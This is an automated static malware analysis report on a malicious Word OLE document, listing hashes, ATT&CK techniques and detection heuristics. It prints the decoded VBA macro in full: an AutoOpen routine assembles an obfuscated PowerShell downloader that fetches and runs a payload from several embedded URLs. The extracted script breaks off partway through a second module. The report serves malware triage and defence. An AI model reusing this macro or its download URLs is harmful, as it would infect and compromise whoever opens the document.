Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ce50b1681fd7f074…

MALICIOUS

Office (OLE)

89.1 KB
First seen: 2018-03-04
MD5: f634a6a9f562b1c8dde7b5953605ec1a
SHA-1: 444b6552c35e14d50032b2c200b840f8953e8c51
SHA-256: ce50b1681fd7f0740374a53470197946eed056a10a4e41b2e56e4fcd7d596879
Risk Score: 172

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample is a malicious OLE document containing a VBA macro with an AutoOpen subroutine. This macro is designed to execute obfuscated code that attempts to download a payload from the reconstructed URL "https://www.blueyachtchart.com/c3y". The presence of the 'Shell' call heuristic and the ClamAV detection further indicate malicious intent, likely for initial access via spearphishing.

Heuristics (7)

  • ClamAV: Img.Dropper.PhishingLure-6443153-0 [critical] [CLAMAV_DETECTION]
    ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
  • VBA macros detected [medium] [2 related findings] [OLE_VBA_MACROS]
    Document contains VBA macro code
  • Potential Shell call in VBA [critical] [OLE_VBA_SHELL]
    Potential Shell call in VBA
    Matched line in script
    oSIoaBnfi = JMsNJjW - crwouwXpskiF / (7654742 + TGDvVJTil - 1846493 + ilDswKc)
    Shell EAAjHZChQv, 0
    aQGFwzYMR = ICBdNvtmKOKM - zFonPKUzw / (5012134 + iXHOHDX - 1728457 + jViIXRpJGlwRN)
  • AutoOpen macro [low] [OLE_VBA_AUTOOPEN]
    AutoOpen macro
    Matched line in script
    Attribute VB_Name = "HVpFnmFF"
    Sub AutoOpen()
    On Error Resume Next
  • Legacy WordBasic auto-exec macro marker [medium] [OLE_LEGACY_WORDBASIC_AUTOEXEC]
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact [info] [EXTRACTED_FILE_STATIC_TRIAGE]
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info] [EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • https://c3y+c3ywww.blueyacD4G+D4GhtchartD4G+D4c3y+c3yGer.coD4G+D4Gm/c3y - In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main - In document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 24155 bytes
SHA-256: b2aacc79f4f58cbcd8712be2d2491e5c9881442a1c7d4dfeb9674dee83d6e0fa
Detection
ClamAV: No threats found
Obfuscation or payload: likely
942 of 1224 identifiers look randomly generated (e.g. 'zKmwJwaldufaJHJPzfkBGjsbD4GFiD4Gc3y'); 14 string-concatenation chain(s) — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "HVpFnmFF"
Sub AutoOpen()
On Error Resume Next
ITSEREIbU = jociVzYGDtRWLw - OBYkOqfCo / (4327992 + TflPnTZwjXXbZw - 3432356 + kQFlITqCCkr)
FFAmnHXjs = nFzwPPqraw - wPulikpAojND / (5464573 + qikjTBSZGw - 2012786 + osDAKclG)
JqGAFWifD = aBUdYhFIHwSX - wbavwwoY / (7108269 + WKAckdwTn - 4314882 + WInLUWvCUo)
Application.Run "wrTPYEmLACm", LuQPFKHUKuJWn
oljHZiblj = MpjwSXEVi - diAobSnk / (5509176 + sWQiiYTUKz - 4102829 + EHHjZotwRaXJ)
LJlsfGrqI = WqZEQtDk - fpuatjvt / (9707223 + jISwGTYnboEHi - 5047038 + kRHUXAshPsTQir)
End Sub
Function LuQPFKHUKuJWn()
On Error Resume Next
sSSljX = ZGNMHXmkwJQj - VzXdkHotKdm / (8097865 + TqzzVofVGiJi - 4190318 + EKLNZsvIDQ)
sRpQiZRQTE = NHTsPcb - aDvkzocEFO / (2782639 + uPjjiwQMz - 7142596 + mjvIjMcr)
NtEdSM = iLvUJaM - wnptpCIwYk / (2044628 + LOYpsJBDf - 9314745 + dXIfjUOZImrQK)
CRttwbip = rvJWqbXiAnjwPH + Mid(("IpPRiF hWGODR+[CHAR]78),[CHAR]39  -CrEplacE'AVT',[CHAR]36)) drFjNUXi"), 14, 47)
qBkrHCvL = YJtzvMWhWZiJKC - TzOuaLUPVoQ / (2260995 + NLvOmZjdwQOivQ - 1903187 + fwRPwaVYL)
XpYbzw = nEtXLfA - TKdPXkTAVh / (71529 + fvKBqpww - 75907 + qXDkmfkbEiiW)
DYHstiBYkIq = wkQahwwFoYzWst - hVhEYhUGLmwnQ / (8904430 + RcJzLQZOQAE - 6347379 + zDOtmst)
GjiDiVc = RzjnJIbRauTnFc + Mid(("rwSJUfiLBMlupXyNSBc3y+c3y + '+'65N+65bKuMwmUIwjNspnirmjZiqjwL"), 15, 23)
YOurhLhdO = GWMshbHG - DUASGIXEB / (4645320 + tQwLkhl - 4141917 + hsYVqsjBAEQ)
tnhbv = ckacOMXwQiGH - SpYBIAql / (6171024 + LvibObVDzHNR - 6176729 + iVVNZKDlRL)
ZcwoZT = DIAsEaAwCP - kkJUuaJzwBJA / (3540033 + icMVfaiTEKSV - 2222101 + hNVdIBllEEQcb)
UTLISFMZB = BizOiiEojIfL + Mid(("OfBtJdHzHMJvMHCbNhSOwnKfach(x2D4G+c3y+c3yD4G0asfc in D4G+D4G'+'x20ADCX){D4G+D4Gt'+'ryc3y+c3y{x2D4G+D4G0YYDWMnjBOpIuj"), 25, 82)
jGvPnz = WpCQjzBYPRS - jfsQBtYHFDwN / (957732 + QKmGSjYuHTzV - 963453 + CrMKwiq)
lwUnalqV = PREjZjVTq - LwiqmJwiKlYYR / (6190448 + TENqnOarBuVCm - 1974944 + YncKJGWLFDMQU)
NvbcmD = qrAXrGc - dDalHjwQ / (1306413 + YSMkwHWi - 9425800 + ImawGmLDViuEQ)
nnEGnkwn = OWuHiFZzo + Mid((" PsfGWjkRIHM[ChAR]70+[Chc3y+c3yAR]105+[ChAR]11665N+65N),'+'[ChAR]39c3y+c3y  65N+65N-CrepLaCE Dc3y+c3y4Ge5tD4G,['+'ChAR]965N+65N2  -rePlACeD4IhzSSzRuqdTBzjKvtHWZEtUoP"), 13, 128)
siLcdaTwj = sBsFvsA - JjzqccfV / (4173864 + vcSUBvaXXzjHc - 3770453 + aFEuFIcdkvjRU)
wCIcmERUOT = HsdTXtUiYzwfXV - aBGjABW / (5233407 + QjTwhYUiGbP - 1304258 + nFaVshEz)
UbwvbLtni = kGbKtakTul - BDnaVAzfR / (4861489 + GuTNBFiIoWdqwM - 4421879 + futmjdpEkR)
OqWCQw = KYkXwpPow + Mid(("TKH+D4Git) D4G+D4GSyst'+'em.Net.WeD4G+D4GbD4G+D4GCl65N+65Nient;x20NSD4'+'G+D4GBD'+'4G+D4G = x20nsadaczzbfSfGSzJ"), 4, 97)
lmMbdRBd = jrfZfpl - uYNoNwdUkYnPcF / (2855993 + jFiQGzzpKMq - 6131709 + VOzvjvjXdmBOOo)
cfXlGKmt = NZXbcCqZ - UqwaXiBI / (9585328 + PJpTvJiGFS - 5761478 + rJpckoO)
cDtKt = ziomaqw - zwksQtZ / (9657167 + FbRtvkHjSz - 7588201 + vtNtuXkVDsFK)
XhwZwRV = zsiZjAo + Mid(("MSOJovRbOpGfClivXfG65N+6'+'5NOxND4G,[ChAR]96  -c3Sqv"), 19, 31)
rinjwcFX = KBuhGIrLTEFXwW - odUMWGQpdZ / (8992658 + BDuqOAwjVqnw - 7067200 + zJBBKmPav)
NvhzI = jSqqtMQIL - pHZOqXCmBwp / (4670625 + HHGncPHRaIf - 1326203 + JFqIZfkJYrjnLm)
vNAjSvVr = cZwYLqjjnZot - JPztHtO / (9320885 + sYKnSiPWzQcXpA - 2249325 + vGZWCjkm)
pkkRTOTtYGB = GGhllzjrEiM + Mid(("WsqdYMUDAiRXnzsTvbQzzzJ"), 12, 1)
zuHYMNRb = XATQZXQjUP - mLmoatIoXHSZX / (6307626 + zEjJTntXj - 4826045 + mJMWAfu)
BfsdjfqbPPi = DUijNmY - qQEawjGYLwLv / (9954690 + oDPXHwbBGnfSd - 9682711 + VVWuECHiwF)
cCpQfh = DoKDUwE - jbTpiaIo / (1869923 + vdGIDpboB - 9106968 + jYRSFvmqDThOT)
wsmwIODnSPP = zJsqjRXojhXO + Mid(("fswzbCWbsFniuRSSKJ4U/uzLLsjuTNPwGSCJAwkK"), 19, 3)
sBmhFfN = cwulVbf - JTzCBXZiVzGzNP / (7569032 + JmvwizcjLOpJA - 302298 + bnlEzSrAHS)
izocd = aQrPpMIEbijjO - qQrniQiT / (5473702 + KcKnYSmodtY - 2332692 + vZdAvamvEXuIC)
ASRHq = NZCKHoM - NBVfIws / (1189591 + miXvOEPitq - 6735573 + FQiWSZO)
njEcVMJE = tCfsTwOzN + Mid(("bwfLsWukfs'+'OxD4G+D4G65N+65NNi65N+65NOD4G+D4GxD4G+D4GNNDc3y+c3y4G+D4GgTZm(), xc3y+c3y2D4G+D465N+65NG0SDCD4G+D4c3y+c3yG'+'avpPQUQhkqTQkKQLq"), 11, 112)
wHQMkfhQ = zCIiiEw - mbNzdzIlqJ / (8153929 + dfmUGsFCdk - 3570764 + AfICIArOato)
iHhKZ = DaBqEqpG - RZSPnXmwwrC / (1757461 + zwqFdpRczkrf - 3284795 + qOwnvMBiGpn)
ZLmtHMp = cFPdCmzScD - wMzpwUp / (5266334 + WrwjwDGzjOrA - 3472789 + NLMUhFhw)
VCnzjX = iRYfqMbfQRp + Mid(("zKmwJwaldufaJHJPzfkBGjsbD4GFiD4Gc3y+c3y+65N+65N'+'D4GteFit);D4G+D4GforeD465N+65NG+D4GHhrcSAzFQ"), 25, 61)
wiqjHKrBFP = QOCwlJjfw - AiOMzjEldmA / (1538682 + DXoJUzdKah - 93505 + mPJcCfoiZjP)
qsZjswBRvNi = aPSVKtPNIswaw - LfVVaBNkMRvJaG / (2203933 + wXIzjFjHzj - 3339899 + SuRifCUJMEFN)
QiqnjlTR = pCBaBTJCjvb - zPGwOVukb / (3547618 + zMiXmCMsR - 8981690 + uCfjwNIkjz)
BNhaC = mOzawXC + Mid(("swwlLnQRPaZJ4Gt/oD4G+D4Gc65N+65N3y+c3yMgoD4G+D4GZ/Fit.SpD4G+D4Glit(FitJTDTpHArdWzYwOrMXPBM"), 13, 58)
RjuOu = XvWzWCJXa - DTiXhcqjTJ / (9093013 + lYsOJGRXXRiRbR - 7186775 + MwjtHRKqPLdB)
uPbFmi = nRrTaKwH - sCGCwloR / (9240633 + qGWWdCpTN - 236258 + wdPNjAmzAHmcED)
WECnFb = mETYCzPNKDR - ORkqkGHuZqpOlB / (3846479 + HDdRTzPlApzCjP - 1013532 + SFYfQRBV)
wLWzEafrJR = QhmOKziKdAWkB + Mid(("jLQJVy+c3yD4G+D65N+65'+'N4Gt)D4G+D4G(x2D4G+D'+'4'+'G0SD4G+D4GDC);break;}cat'+'D65N+65N4c3y65N+65N+c3yG+D4Gch{}}D4G) -r65N+65NePlACe (jPBds"), 6, 128)
cVRzm = CzpvHFLJl - vjdoiqCHUKu / (3554018 + wCwYPJwlTd - 1950811 + QbGOrzvLkIG)
UWYrzvtz = ppPERiRUkd - tIhwzmscCSKOO / (9211569 + dMzHlnvbjZuuU - 7825834 + qtniMFKB)
iiNmJn = ZsjDEibAIXBFVd - FzjwWEsYnqcRa / (6121512 + nTKDitGsXEwt - 7224388 + nGUQwcPZLfrjTt)
TJFDpVnln = JEwPEmAdUFGZzb + Mid(("EzFjbdbXhNqoXzVdazrwL3yD4'+'G7/?D4G+D4Ghttps://c3y+c3ywww.blueyacD4G+D4GhtchartD4G+D4c3y+c3yGer.coD4G+D4Gm/c3y'+'+c3yDD4G+D4c65N+65N3y+c3yGIj65N+'+'65Nc3y+c3y'+'D4G+D4GVtHfFGNwIjpIUjwO"), 22, 148)
IWrBX = vwzFItXKG - AkIAiCTOHfL / (249015 + NfwqwZLMFM - 532499 + wdKQSHjZst)
SnGMjwwVsQV = SMWRGWaOGtY - ZLDZluOuXFfj / (4858955 + zpYfbhUC - 5766605 + bHFqfwwbZrk)
TYPXqTjGGt = OiufdwF - hqswYlqaS / (8365631 + XhZzipXPZ - 1700045 + GhYsapl)
JOSbqWN = bNAUZkhu + Mid(("zfEPDzaaanvITKlsN4G+D4G'+'U.TZmDoOxNWD4c365N+65Ny+c3yG+D4GnlOD4G+D4GxNOadD4G+D4G'+'FIOD4G+65N+65ND4GxNl'+'eD4c3y+c3y65N+65NG+D4GTD4G65N+65N+DAOoESQRkw"), 18, 124)
AukVpNKNhIm = MXokPqFjjEd - LYjKApWovaRd / (2261171 + jGVRnuYGL - 4057198 + EVGzmQLSCDkl)
uSptZzXQ = HjmtfmFLZAJz - ORiKEMLZv / (3935835 + rIJFKJMvU - 7365874 + GHfbZPaf)
IzbNACsdYC = wzZCtkrwYa - LLWCWdAB / (3015759 + OfbEKafdnwzPz - 3875868 + iHLaRNWucwulcE)
fVcnSWVc = DVzQwlOIRtHVJh + Mid(("GOjchaXduhkuJcCK?D4G+D4GFit);D'+'4G+D4GxD4G+D4G20SDC ='+' xD4G+D4G2'+'0en'+'v:publiD4G+65'+'N+65ND4GcD4G65N+65N+D4G65N+65N +D4G+D4G Fite5tGiFkGLobfhaO"), 17, 122)
MEbhNL = vMCInWoa - ZrkzGPpCYrhZzR / (7412567 + kJcQFslQQCi - 6664723 + QZawSIqhzr)
QoMGrZJ = UJzuwlwuP - DMLKshGUiDhG / (6700699 + RGbhJwul - 3586828 + wvuqTfGn)
cJpZLNzdbwz = mNNOnZajM - nlNapcqJO / (7161288 + mRtCNzmPA - 437683 + towuEsnIiMhUiX)
ujSmXfktG = PZQhhSwzjJMVli + Mid(("PiliojjaNSUcZlp+65ND4Gd D4G+65N+65ND4c3y+c3yG= &D465N+65NG+D4G(FitnFit+FiteFD'+'4G+D4'+'G'+'itD4G65N+65N+D4G+FiD4G+D4Gtw-objecFit65N+65N+D65N+65'+'N4G+D4GFittFD4G+D4GitD4G+D4G)6OiuzWfilQRiwlZ"), 16, 162)
rBcGlqkVc = boULOqsYivY - VGCGEzOiichBXf / (988116 + owzkjNjusWFof - 2030766 + JpfAlAsvwEhvz)
DKCvnzKD = ToilBjiz - RHZHOirazTnXL / (8574392 + TqwAwfzRhnZ - 6534463 + CiaGMCNsLs)
BCFYT = MHiicLjHvDR - niwISqsU / (7843336 + UXUtjLJ - 6005440 + HwRorAQpVERm)
zNazjQFQRPP = UFOdWrCzAwTL + Mid(("daVda'+'65N+65ND4G+D4Gc3y+c3y.co'+'m/rL7zkD465N+65NG+D4Gpac3y+'+'c3yD4G+D4G/D4G+D4G?hdCUZuF"), 5, 81)
SatWqDnzJ = pLmHNjfXwQ - KLVtHHBAW / (3107688 + OCmAFHwPkj - 7709007 + ccEtDGpjSWA)
uuKqMISpHYf = IRfGmsBwHSz - UMdYZjfiWktQ / (505949 + wuhjErBLs - 7786840 + scrhrTJfTYq)
tQXOcIZm = QGjqSEXXODZ - HPXNFjIUowhGnB / (5952124 + klioHRQdU - 233033 + HUQNoCzabvva)
tIwWJCXGOj = kUnYNuuCT + Mid(("faVdSRLzy'+'+c3yCrepLaCE([ChAR]120+c3y+c3y[c3y'+'+c3yChAR]50+[c3y+c65N+65N3yChAR]c3y+c3y48),[ChAR]3c3y+ccHuj"), 9, 96)
BUHbCnWbfQF = kmpzutEABz - jtEpaDVoLw / (4789213 + dwEswSiOdkTS - 2139592 + cACWkOWQkfYN)
zblwZfNo = WkzRWLBLDqAGi - lvwZliqbU / (7252085 + NKONLYTkbMddS - 9419989 + JYYKBQB)
fUsqujzKHjz = lUlGmizuPNcIBn - rSjVGHHRfcfVRC / (2026263 + YLPcsZShCcRN - 3066476 + oFWahsVuvniDG)
htcsAtzqr = PWoTYcDRZGnc + Mid(("zsBkFuvIhqjiOjO.nAmE[65N+65N3,11,2]-jOinD4GD4'+'G) ( ((D4G65N+65Nx20nsadD4G+D4c3y+c3yGasD4Gc3y+c3y+c3'+'y+'+'c3y65NdXcwZUjnQSiPMOFVHnu"), 16, 100)
ImSThWHFdI = AzTdptBpo - wrVSOdQbwpT / (7777387 + ouYImmrTLUP - 8469617 + bRzkBQpjPq)
YPltNRNQCb = mPajKMQwLZ - jRlPDzHmXFa / (8725349 + wdOnDzt - 4881524 + BVWLKJz)
qlsCBHawAHV = Rjvwijz - MsZcTRMVXijw / (5632052 + MjFiPPsrmwmSot - 9548672 + PwOAqHU)
kAwOZSlAi = HNhsFdEwlKF + Mid(("ASOzJoCOwMTzOHtmN'+'(FitD4G+D4G.D4G+D4GexFit+D4GSfP"), 17, 32)
XpTwphNf = jtUFbpAcS - SSjjcEFLIt / (6058965 + rDKVlsS - 5001001 + OMffGVBtHkHq)
qwuNDKDiNM = VJtSwROEiJl - CRuFEIJsqDF / (813517 + VjDSBIX - 3009083 + hBcTuBLdj)
VaTPrbju = tBEEHnD - zwmSDoNciLl / (6427845 + NNnjtdl - 2690819 + hMXCKCRi)
zfSpmOv = lkJBnbcBaVTPrD + Mid(("HITMSulIdXnkJqUzCD4G+D4GX 65N+65N= Fit D4G+D4G D'+'4G+D4Ghttp:/c3y+c3y/sofDc3y+c3y4G+D4GteD4G+D4GdgebdD4G+65N+'+'65ND4G.com/D4G+D4G687c3y+c3yyc/D4G+D4G?h65N+65NttpD4G+D4G://dD4G+D4GulfacolD4G+D65N+65N4GltD4G+'+'D4GdqmGjYI"), 17, 199)
uJwDwLSToZz = CfnQVOKROpRauA - LLDPHjUnwLT / (9147234 + jwojUYAiOAJhU - 6179536 + kABUwJtGQ)
oNOYPqKc = lPhrrFBSTlSB - GWAzwKthmDDD / (9231595 + wzhmpYvj - 1845121 + mXuIOAuwi)
SwDRt = vwwJzvXDw - dovvCTmz / (5503244 + pWMhMZQlTlI - 1069154 + jNACXouBrk)
STFcjIhqzpB = iwfaRcPznFRTAs + Mid(("Hlhqs'+'5N'+'+65N raD4G+D4GndD4G+D4GomD4G+D4G;x20YD4c3y'+'+c3yG'+'+D4GYU = .(FitneFit+pzsPRdQwhMvn"), 6, 81)
KIChkGDWQd = XfmkNDXTPiCRPK - cwmOrNwRfYXO / (6887999 + FoNnZRPPG - 4501487 + RfLQCdwknccmXX)
vfnjAOG = ZOGMpooDJtod - tTNrPUZimAcuZ / (5769393 + mdCqPqrBIuiFdc - 486189 + OAIqUPkXDw)
ElAZrwLc = nNdRPKr - fqwNzCSEz / (6322091 + vFjcOuRnb - 4486098 + fnRoDnicSumLW)
ULFBPWQR = pwbwFuNuVFaYmP + Mid(("rzK);&(65N+65NFitInvoFiD4G+D4Gt+FitkFD4G+D4Git+FiD4G+Dc3y+c3'+'y4GteD4G+D4G-ItemFic3lLJfKNaUbuAcHG"), 4, 81)
FWWFprt = PXwXPtnLKvKw - aVOTJuMvwHH / (9893116 + MFowOtzDPF - 3789657 + WSjVFrwpXk)
wziUizicSu = cUtBqoQPq - qjhWLhRwbK / (3077275 + wnbdasQJJBbnMi - 4080937 + IOwpczfmBwuJj)
IhNuuOKLALS = waChYFZNOXzhN - EuKhMZqNLaRwH / (7948308 + bwGcTFBkfFP - 3411034 + zbqvlrhGoMzGAi)
EaTGW = QmJoCKnqoCvD + Mid(("EYjrzaohqr65N+65N]68+[CHAr]5'+'2+[CH65N+65NAr]71),[CHAr]39)) 65N).REplaCE('+'65Nc3y65N,[S'+'tRIng][CHAr]3'+'9).REplaCE(65N5'+'Ty65N,[StRIn'+'g][CHAr]36) )') -rePlAcE  ([CHAR]54+[CHAR]53HpBRDFAmPqQtLoGMhf"), 10, 176)
bhWGiKtdj = uiDKfbw - uNkkVLQI / (4138578 + mIWTWmJPdQhKL - 397122 + rrIiwIkAwFUirt)
NwDBOi = icPAmjhbL - AQwfbkCim / (5814536 + HdYiBIXNCI - 3386755 + NiEuLPOJPz)
hpEPwSwLOrW = vsmUXUSvF - wbwqVlbKO / (1857834 + jukzWqqT - 4629953 + EKQdmOnAsj)
UfkJVqZjM = bPbwklnYs + Mid(("jFiXQzwafnIfbSby+c3'+'yLaCED4GTZmD4G,[ChAc3y+c3yR]34)) c3y) -R65N+65NeplaCe  ([CHARzjQNoOmw"), 16, 67)
tkJJmznWN = BnFMwCXAicchur - iNjXoKVau / (4383936 + TpQmAqlVDWKQo - 2325044 + zOGlfLZqX)
HhJwBAnjoI = GFwpjNLpKihkr - mvZouXwvLYK / (1403078 + Jrcuztwuk - 7466240 + XJwbddhPWfz)
EHbEmmrGn = lkwztLuZiYtC - iniquhBIuRkZVR / (6462788 + vkoKHqKDtDipN - 286424 + PwcvqzYbzzarTL)
zLiSXpzOoKG = MGQHFDpdm + Mid(("ojsqORYzzQBqVlhpMURqnJRGoUY4GZm(x20'+'asfc.TZmToStrD4G+D4GbbEhBoZTOvnq"), 28, 31)
zGRcj = zrzMvsSVcsV - rXJqNjwqsSfod / (5889584 + KKDmDMVak - 9702693 + fzApzfYVrLiO)
MZvcLs = JtmmiLKjRZI - ZGRiVwZs / (5413825 + zqCVAQH - 7504055 + jvYcKZiv)
sbIPTTiKw = nBNZsfYZGq - OFWDHtwjJL / (8896876 + iRcOAdHEmAA - 832097 + nZwXwbJQRta)
oHhiri = XuMiinFsqrd + Mid(("rJdCnO'+'?htD4G+D4Gtp65N+65ND465N+65NG+D4G://reviewzaap.Dc3y+c3y65N+65N4G+65N+65ND4Gc3y+c3yazzWQWNEjSIbQkPznEjdjSjIzM"), 7, 87)
mVzjju = PQXvzmiN - ScTTwMN / (6868994 + KMYBpfIqbnOn - 2053702 + DRiGYfK)
ZDqzPXhmcVW = ijWHsAzimYd - PXjObrmI / (2131168 + wQHcPCPGoDZjis - 5855917 + nHtwBpKBkjiU)
izlaLhG = htBTnhGAPku - jkZjisrjt / (761098 + POuJGGrjTvb - 1349821 + XNrKXhYW)
TJENJWHt = VUQdzmNtaj + Mid(("fzrZQubD65N+65N4G+D4Gtt'+'D4G+D4Gp://D'+'4G+D4Gja'+'ti65N+'+'65N.D4G+D4Gcc3y+c3yom.au/kD4G+D'+'4GRD4G+D4GBD4G65N+65N+D4GG65N+65NSD4'+'G+c3y+cjvkuZfGDfwOOoPAC"), 8, 134)
sATpbwPNT = YAuXBbTEdPLUB - MMfHRhYEVopu / (5569259 + qdwlJwmX - 7627322 + VWOQbVF)
FNPWlciFG = mKYYzGUXUUiF - GwHNzSZLCuoY / (5938426 + uSIcAiIISnSj - 8070462 + liSshSOYG)
IsaXT = bCjVjPj - STZELriXZwfUuT / (5527931 + aYbwqMYV - 2267073 + BzCmYCD)
aWOpWTK = hVFkRCoqkkdOlE + Mid(("JbSRNpdP+c3y+c3'+'yFCLKRASinFQMFRAdQwt"), 9, 11)
WbOOav = tmIHaXvLo - JGvDtHqhVnacQ / (5453783 + GQtGAijT - 1770105 + ZwtXirMOQJG)
czAVwu = onLkfpFoQVj - THCEnFd / (7622271 + bTKwKqwNNATA - 5985505 + FvQCrNULDQs)
DozNBSjI = XpHbKjS - MTAnVwJaDVNAo / (5924197 + JWCmaRPQuEGTHF - 7292019 + mhpPluchsDtIh)
ZzZvVF = NWrjSaNKt + Mid(("aUYfkPws'+'PrEFerENce)[1'+',3]+65NX65N-JOIn65N65N) ( (65N. (65'+'N+65N 5Tyenv:COMsPeC[4,15,25]-jOINc3yc3y)'+'( (65N+65N(c3y&((GV D4G*mDr'+'*D4G)kB"), 9, 136)
WPUtDaBblDt = sYzDFjOiCURfaT - PLPuVtWXGirMrb / (2797087 + hhsoRRip - 8653739 + OAZrBcYQc)
QHVZP = iKnBVArUNXWC - NkwhfhzcZBCiV / (9655247 + hOobwhYWt - 8403165 + QaNbVwLMM)
NuGqJarMEfK = DvsjfEJJ - WzCbnwiuEGoN / (925433 + MQWPwfGSJmIdT - 9139564 + TcPNJVSOzacmB)
iwcEjm = rPsswEI + Mid(("uMGqGvOjqatD4G+D4GurD4'+'G+D4GewebsD4G+D65N+65N4GiDc3y+c'+'3'+'y4G+D4Gtes.D4G'+'+D4GneD65N+65N'+'4G+DziHIcHCVwiowQFCIHZzuIhwOu"), 12, 90)
lvZdChc = KdiDqQSJfnCki - AvUtCXoWsE / (2164160 + OPfNPaK - 7589528 + jiSczjQ)
jXiCLkPD = zzWbzsClmQlAol - snCCdRYcaq / (3680471 + QCREqYYtF - 7753318 + OXcccKZnQwF)
GFFYZXf = ovinfbXwkj - liVLucPrTDL / (7590365 + AowSADCSLcc - 1833981 + ksSirriv)
qbpNEzjPbOA = FXtwFjSI + Mid(("ESJCpLmqYQfsd.next(100D4c3y+c3yG+D4G00, 282133);x20ADFMJLUShNjREZQ"), 12, 42)
pjGUb = fFwjiIaGsBhrW - kMTEkJupTU / (8636681 + MZGwBNw - 285569 + duKEmQnNzzTij)
UJCTjP = JKCOcwp - bncwAAuATsVm / (1338661 + JAztHbWXZ - 4411640 + YwowzWFzsTW)
ERXvGuQz = pPmTzdaIuts - CQioOPE / (2794072 + QbEGBUW - 3138467 + OwmYIdVHZtwOl)
DisbR = tGwfKBGlWdHwm + Mid(("kIIBmhRwLKwARAsOHFD4G+D4GitD4G+D4G + D4G+D4Gx20c'+'3y+c3LTNaillZchH"), 18, 39)
OnlkovhNBv = niNvJEsEit - dIFTGqKQr / (6024864 + ASElizHmjiDjqm - 8949210 + ktVhzKYSbiz)
bSSIhDYPn = lEsdtqiurYW - zsJkaYOjMNZWV / (9647058 + pumKzCfAfmZpzE - 25215 + MWdjHAnsCTRP)
UPcrwoGa = iVIvtszEOX - SriwBiPbMbNzs / (2782154 + pHuHfkPcBQRuF - 2346463 + hwzmRQW)
hjGQbPo = EnwjnQicOIV + Mid(("HQWPaiLNtfL . ((gEt-varIABlE '*mdR*').naME[3,11,2]-JoIN'') (((' & ( ([StRIng]AVTveRbosETQ"), 12, 76)
YOLiwNsljz = GrFCOchk - KPLuPzGzZSRDo / (5384296 + LjluBNBIHWrIjO - 335551 + HGftasCAWJjfka)
MVJtBcph = SPKqhrni - JGDXXqZiXYK / (9525891 + iVTikXsi - 4231801 + jPZtWXTCTX)
ljDnIGdiCDZ = kToicjj - HLQJJjp / (4461443 + HQqvniW - 1432813 + wDKDWqaDwBfzHr)
ldfmY = qTDpDwQWPjEDs + Mid(("KFPrrqzvQlLluwMvjLHFD4G+D4GitwFi65'+'N+65Nt+FiD4G+D65'+'N+65N4Gt-D4G+D65N+65N4Gc'+'3y65N+65N+c3yobjectFD4GlBTFlQiAcvBaojcqzaCl"), 20, 87)
BkjlIXE = QuDjJzl - XijjqDpaj / (1030141 + nrEAYiSYVGAh - 6905601 + KnbmtuBQNb)
ILbZiSvB = IcmKXqXLitI - ufwqYQLW / (9347181 + JjQNnpKhXdcXQF - 6261601 + zQdWFdBcj)
QPicHBhW = vDczCFjJ - GuJCiAwWi / (6766424 + PsJKSutZtj - 5888703 + hjuHEXaXrGnaT)
WHUniumfQV = cOMQGQNj + Mid(("MfZJCZVlLrdECcur3y6 -Crepc3VFw"), 17, 11)
LuQPFKHUKuJWn = OTPmrJAVNqRJGc + NuWIGWsJrCuSh + RBVojFKfjrU + ChrW(34) + LGPlbGcW + hjGQbPo + ZzZvVF + htcsAtzqr + ujSmXfktG + STFcjIhqzpB + ldfmY + OqWCQw + qbpNEzjPbOA + zfSpmOv + zNazjQFQRPP + TJENJWHt + TJFDpVnln + pkkRTOTtYGB + wsmwIODnSPP + oHhiri + iwcEjm + BNhaC + fVcnSWVc + DisbR + GjiDiVc + kAwOZSlAi + aWOpWTK + VCnzjX + UTLISFMZB + JOSbqWN + zLiSXpzOoKG + njEcVMJE + ULFBPWQR + wLWzEafrJR + nnEGnkwn + XhwZwRV + tIwWJCXGOj + WHUniumfQV + UfkJVqZjM + EaTGW + CRttwbip
otswDMfIF = qihwDlZHvXor - mqSLlrBw / (2513373 + rGdQISjd - 6844671 + KcCaMDiMTLEhwj)
GIkAuQDkd = psZURpOuE - CJnswiNpfBGJKz / (1966103 + hjiStawjkUdJui - 9459071 + cBdwVsCM)
DOFbMjhbK = HiLmAcLDH - EEvAEwjITNi / (7903863 + WPfUWXEnBwc - 4532887 + wqABlRlYI)
End Function

Attribute VB_Name = "onWKwTlCaQliPC"
Function RBVojFKfjrU()
On Error Resume Next
uafZhO = OHiWMsNldrwmNV - cGXfdwQC / (9590561 + vihBLWi - 1131033 + SzbJUwGzYEcGE)
dVnWwr = jELXsmzzEkRQK - kRVUhVCKBwCj / (4475445 + rwVwqrAzAwlTtV - 8669425 + sDoZOGjHZjnWC)
GGwDhSsm = VMPBFGPTa - jnQWiNchR / (1995613 + zszilON - 4723531 + EdumdZEr)
ndmqHWR = BwbtSLphRvXP + Mid(("4zviCjkf&&set %dfGHU2TZ5i3wkcSuf5kzL"), 9, 12)
mujji = MGGFsJWURT - rBuSOCtdsJ / (1725865 + SiifVWEHuBoM - 200029 + YBcHFnXuvaiLHq)
swrfTB = MUPDVoaKiAwN - apMiRQdr / (200483 + DVNXjIAKONZi - 6533238 + JfJwrwGHaM)
EiUki = FNwtrNqLiL - HQrBdqjzmrHn / (4775159 + GfACfwvBDduE - 3267095 + ziXzNcYtHp)
SPZftYaZ = mbZdVtbqM + Mid(("jbf5zamwzEXfWz5l8I4PCzo"), 6, 2)
